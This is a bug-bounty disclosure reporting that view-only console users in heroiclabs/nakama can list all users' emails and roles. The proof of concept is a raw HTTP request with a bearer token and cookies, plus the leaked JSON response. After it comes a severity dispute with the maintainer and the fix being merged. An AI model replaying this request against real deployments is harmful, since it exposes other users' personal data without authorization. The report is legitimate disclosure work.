unprivileged user can see user details like email,role etc in heroiclabs/nakama

Valid

Reported on

Apr 2nd 2022


Description

view-only user can see user details like email,role etc.
I see there is different type user role in nakama. Based on role user have some limit .But this bug is a privilege escalation bug

Proof of Concept

1. From super admin account add a new user called user-B with view-only permission.

2. Now login into user-B account and here he cant seee other users in his account .
Now user-B sent bellow request which will disclose all available user

GET /v2/console/user HTTP/1.1
Host: 127.0.0.1:7351
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c24iOiJ1c2VyMiIsImVtYSI6ImFnc3lkZ2F1QGFzZGEuY29tIiwicm9sIjo0LCJleHAiOjE2NDkwMDUxNzEsImNraSI6IjRhNmYyYjBhLTgxY2ItNGZiYS05MmUxLTNlZTRhZmRlNDEzYyJ9.WXkLUmcTd7MacFd-s_zMdXlQbbxaxDiQlhv1GeB3wws
Connection: close
Referer: http://127.0.0.1:7351/
Cookie: __profilin=p%3Dt; bagisto_bugbounty_session=eyJpdiI6Im1JaktwamRWQUlkcFJ3bDRnYU1CS2c9PSIsInZhbHVlIjoiS29YSTVPQVkvOCtXcW5tTDhoeDVTcGVOVEQ0RlFWcWtudFVPN2NWaktOOTVjRWRibjBwWVhwdmJFcy9McGgzNHJlUzhyc1NJOXVMMWI2YmNNaWxSRWtKNTFVN1dHL0tWV2EwWmVhd0RVcHQvNVNPcWpqWmNzQVQzMkVaZ0U0R3oiLCJtYWMiOiJjZjdiY2ZlNTY1MTc5MjJiODQ0MzJmNjE3N2Y3YWIyNWU1ZjcyZWY1MzRlMDNhMjlkOTRkZTFiMDRiNWNkOWRhIn0%3D; xbackbone_session=ia673umahu6to3r91ilgc38vmq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Account: TEST2


response


{"users":[{"username":"user2", "email":"agsydgau@asda.com", "role":4}, {"username":"by_admin1", "email":"by_admin@asda.com", "role":4}, {"username":"user1", "email":"user1@localhost.com", "role":3}]}

Impact

User with view-only permiision can see other users email details

We are processing your report and will contact the heroiclabs/nakama team within 24 hours. 3 months ago
We have contacted a member of the heroiclabs/nakama team and are waiting to hear back 3 months ago
heroiclabs/nakama maintainer modified the report
3 months ago
heroiclabs/nakama maintainer validated this vulnerability 3 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
heroiclabs/nakama maintainer
3 months ago

Maintainer


Thanks @ranjit-git for this - I've marked the issue as 'Low' due to the nature of the way the Nakama Console works - I.e. someone must trust you originally to create you an account first, and therefore this is not possible as an unknown individual. However, this will be fixed soon.

ranjit-git
3 months ago

Researcher


@maintainer yes , console user who dont have permisison can fetch the details . . i think this should be in medium category . As this bug is privilege escalation bug it must be already a console user .

ranjit-git
3 months ago

Researcher


here i calculated the CVSS score https://ibb.co/3dsVRHc I think you have put every impact to none

ranjit-git
3 months ago

Researcher


sorry wrong image provided above corrent calculated score is https://ibb.co/HgQbYrY

ranjit-git
3 months ago

Researcher


here is score calculated https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N&version=3.1 impact cant be NONE. As this is privilege escalation bug it must have some impact

can you plz update the severity

heroiclabs/nakama maintainer
3 months ago

Maintainer


There is no privilege that's escalated, and more practically there is no difference in the outcome - the 'bad actor' (who must already have an account and be known) cannot do anything further to the system - e.g. cannot delete player accounts, cannot delete Storage records and cannot create/delete console users. If so, please file it differently as they are a bit more severe than what you've so far disclosed. Thanks!

ranjit-git
3 months ago

Researcher


yes agreed that user cant modify the details . But still he can access the information that he is not authorized to do. Privilege escalation is not about only modifying data but also leaking data . Just like many application like github,gitlab,google drive, shopify,facebook page manager,linux os ,windows os etc ,here user may have many role like viewer,editor,admin,developer,root,sudo (all this roles are trusted and added by admin himself ) and some roles are not permitted to see some information . If some how non-permitted role can see information then thats privileged escalation bug . Privilege escalation is not about only modifying data

ranjit-git
3 months ago

Researcher


@maintainer can you plz recheck the severity ? i think CVSS score should be 4.3(low)

Jamie Slome
3 months ago

Admin


@ranjit-git - please respect the assessment of the maintainer. Ultimately the decision lies with the maintainer, and so overly pushing for a certain conclusion around CVSS or the final state of the report will not be accepted.

ranjit-git
3 months ago

Researcher


@admin yes i respect maintainer always . I was just trying to explain the the impact here as huntr look for severity based report now .

Jamie Slome
3 months ago

Admin


Understood 👍

We have sent a fix follow up to the heroiclabs/nakama team. We will try again in 7 days. 3 months ago
We have sent a second fix follow up to the heroiclabs/nakama team. We will try again in 10 days. 2 months ago
We have sent a third and final fix follow up to the heroiclabs/nakama team. This report is now considered stale. 2 months ago
heroiclabs/nakama maintainer
a month ago

Maintainer


This looks to be a duplicate of this: https://www.huntr.dev/bounties/c20a3868-93cc-4d6e-ac60-4a33db6eabc7

heroiclabs/nakama maintainer
a month ago

Maintainer


@Jamie - apologies looks like I've added my auth-token to the URL above - can you please sanitize and blacklist the token - apologies.

Mo Firouz confirmed that a fix has been merged on 8e7102 a month ago
The fix bounty has been dropped
Jamie Slome
a month ago

Admin


@Mo - I have disabled access with the generic HeroicLabs token. I will redact it from the message and re-enable access with a new token shortly 👍 You will all still be able to access reports directly via your personal accounts.

Jamie Slome
a month ago

Admin


All redacted and updated with a new token ♥️

Mo Firouz
a month ago

Maintainer


Thanks so much.

to join this conversation